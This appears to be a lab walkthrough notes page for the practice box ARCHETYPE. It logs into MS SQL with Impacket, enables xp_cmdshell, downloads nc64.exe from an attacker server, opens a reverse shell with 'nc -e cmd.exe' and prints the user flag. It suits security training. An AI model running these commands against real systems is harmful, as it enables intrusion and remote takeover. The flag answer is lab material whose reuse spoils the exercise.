MS SQL

MSSQL Injection Cheat Sheetpentestmonkey
root@oco:~$ cd impacket/examples/
root@oco:~$ python3 mssqlclient.py -h
 Impacket v0.13.0.dev0+20250226.212301.ead516a1 - Copyright Fortra, LLC and its affiliated companies
 
root@oco:~$ python3 mssqlclient.py ARCHETYPE/sql_svc@{TARGET_IP} -windows-auth
 Impacket v0.13.0.dev0+20250226.212301.ead516a1 - Copyright Fortra, LLC and its affiliated companies 

 Password:

 * the -windows-auth flag specifies the use of Windows Authentication
SQL> help
 lcd {path}                 - changes the current local directory to {path}
 exit                       - terminates the server process (and this session)
 enable_xp_cmdshell         - you know what it means
 disable_xp_cmdshell        - you know what it means
 xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
 sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
 ! {cmd}                    - executes a local shell cmd
 
#step 1: check role
SQL> SELECT is_srvrolemember('sysadmin');
 -
 1
 
 * 1 refers to boolean true, 0 refers to false
 
#step 2: check whether xp_command cmd execution is enabled; if not enable it
SQL> EXEC xp_cmdshell 'net user';
 ERROR(ARCHETYPE): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.

#step 3: enable xp_command cmd execution; this can be turned on by the adversary as they are currently logged in as sysadmin
SQL> EXEC sp_configure 'show advanced options', 1;
 INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.

SQL> RECONFIGURE;
SQL> sp_configure;
 name                                    minimum      maximum   config_value    run_value   
 ---------------------------------   -----------   ----------   ------------   ---------- 
 xp_cmdshell                                   0            1              0            0 

SQL> EXEC sp_configure 'xp_cmdshell', 1;
 INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
 
SQL> RECONFIGURE;
 
#step 4: proceed w/ enumeration
SQL> xp_cmdshell "whoami"
 output              
 -----------------   
 archetype\sql_svc

 NULL
 
#step 5: establish stable remote shell
SQL> xp_cmdshell "powershell -c pwd"
 output                
 -------------------   
 NULL                  
 Path                  
 ----                  
 C:\Windows\system32
 
 * determine where to put the reverse shell payload - the destination must be a regular user writable share; system32 is writable only by administrators
    - good candidates are: 
       - c:\users\{userName}\downloads
       - C:\Users\{userName}\AppData\Local\Temp
 
root@oco:~$ BROWSER > https://github.com/int0x33/nc.exe/blob/master/nc64.exe?source=post_page-----a2ddc3557403---------------------- > Download RAW
 
 * place the raw executable in ~/Downloads 

root@oco:~$ sudo python3 -m http.server 8080

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; Invoke-WebRequest http://10.10.14.215:8080/nc64.exe -outfile nc64.exe"

 * The -c flag instructs the powershell to execute the command
 * Invoke-WebRequest is aliased as wget
 * 10.10.14.215:8080 is the attacker's payload server
 
SQL> xp_cmdshell "powershell -c ls C:\Users\sql_svc\Downloads"
 output                                                                             
 --------------------------------------------------------------------------------   
 NULL                                                                               
 Directory: C:\Users\sql_svc\Downloads                                          
 NULL                                                                               
 Mode                LastWriteTime         Length Name                                                                     
 ----                -------------         ------ ----                                                                     
 -a----         3/8/2025   6:58 AM         226042 nc64.exe 

root@oco:~$ sudo nc -nlvp 443

SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.215 443"

 * this cmd binds the cmd.exe (on the target) through the nc (nc64.exe uploaded to the target)to the attacker's listener
 * 10.10.14.215 is the attacker's IP where a netcat lister is active on port 443
 
root@oco:~$ nc....
 listening on [any] 443 ...
 connect to [10.10.14.215] from (UNKNOWN) [10.129.163.160] 49677
 Microsoft Windows [Version 10.0.17763.2061]
 (c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\sql_svc\Downloads> dir ..\Desktop
 dir ..\Desktop
  Volume in drive C has no label.
  Volume Serial Number is 9565-0B4F

  Directory of C:\Users\sql_svc\Desktop

  01/20/2020  05:42 AM    <DIR>          .
  01/20/2020  05:42 AM    <DIR>          ..
  02/25/2020  06:37 AM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  10,720,813,056 bytes free

C:\Users\sql_svc\Downloads>type ..\Desktop\user.txt
 type ..\Desktop\user.txt
 3e7b102e78218e935bf3f4951fec21a3

PreviousSMBNextWINPEAS

Last updated